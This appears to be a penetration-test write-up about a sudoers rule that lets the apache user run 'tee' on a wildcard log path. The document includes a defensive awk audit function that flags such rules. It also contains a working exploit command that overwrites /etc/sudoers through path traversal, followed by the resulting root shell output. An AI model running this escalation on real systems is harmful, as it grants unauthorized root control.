sudo tee


The apache account has been granted sudo privileges to execute the command /usr/bin/tee /var/log/httpd/* without a password. The trailing wildcard (*) is a critical security weakness: sudo matches wildcards in command-line arguments with fnmatch(3), and in arguments a wildcard also matches the "/" character, so the rule accepts any string that begins with /var/log/httpd/, including one whose ../ components resolve to a file elsewhere on the system.

Because tee runs with root privileges, an attacker can use path traversal (e.g., /var/log/httpd/../../../etc/sudoers) to overwrite sensitive system files such as /etc/passwd, /root/.ssh/authorized_keys, or /etc/sudoers. This leads to privilege escalation, unauthorized access, or complete system compromise.
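An added example, not from the original write-up: a POSIX shell audit function that reads sudoers rules (or the output of "sudo -l") and prints every rule whose command arguments contain a shell wildcard, the exact pattern that lets the traversal above through. It strips the user/host, runas and tag parts with awk and then looks for a "*" or "?" after the first whitespace of each command. The function name flag_wildcard_args and the sample rules are assumptions; the awk program uses only POSIX features.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag sudoers rules, or
# "sudo -l" output lines, whose command ARGUMENTS contain a shell wildcard.
# In sudoers a wildcard in an argument also matches "/", so the rule
#   /usr/bin/tee /var/log/httpd/*
# also matches /var/log/httpd/../../../etc/sudoers.
#
# Usage: flag_wildcard_args [file ...]   (reads stdin when no file is given)
# Prints each offending line; exit status 0 if at least one was found, else 1.
flag_wildcard_args() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }              # skip comments and blank lines
        {
            spec = $0
            sub(/^[^=(]*=[ \t]*/, "", spec)              # drop "user HOST =" (sudoers form)
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "", spec)      # drop "(runas)"
            gsub(/[A-Z]+:[ \t]*/, "", spec)              # drop tags such as NOPASSWD:
            n = split(spec, cmds, /,[ \t]*/)             # one rule may list several commands
            for (i = 1; i <= n; i++) {
                # a "*" or "?" inside an argument, i.e. after the first whitespace
                if (match(cmds[i], /[ \t]+[^ \t]*[*?]/)) {
                    print $0
                    found = 1
                    break
                }
            }
        }
        END { exit (found ? 0 : 1) }' "$@"
}

# Typical use on a host: audit the live configuration (needs read access to sudoers).
#   flag_wildcard_args /etc/sudoers /etc/sudoers.d/* || echo "no wildcard arguments found"
```

The check is deliberately narrow: a wildcard in the command path itself (e.g. /usr/bin/*) is not flagged, because sudo does not let a path-name wildcard match "/", whereas an argument wildcard does. Run the function over /etc/sudoers and /etc/sudoers.d/*, or feed it the output of "sudo -l -U <user>", as a quick configuration review.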

bash-4.2$ echo 'apache ALL=(ALL) NOPASSWD: ALL' | sudo /usr/bin/tee /var/log/httpd/../../../etc/sudoers
bash-4.2$ sudo -l
User apache may run the following commands on megavolt:
    (ALL) NOPASSWD: ALL

Granting the sudo ALL privilege to the apache user

bash-4.2$ sudo su root
[root@megavolt tmp]# whoami
root
[root@megavolt tmp]# hostname
megavolt
[root@megavolt tmp]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:d8:91 brd ff:ff:ff:ff:ff:ff
    inet 192.168.177.115/24 brd 192.168.177.255 scope global ens160
       valid_lft forever preferred_lft forever

System-level compromise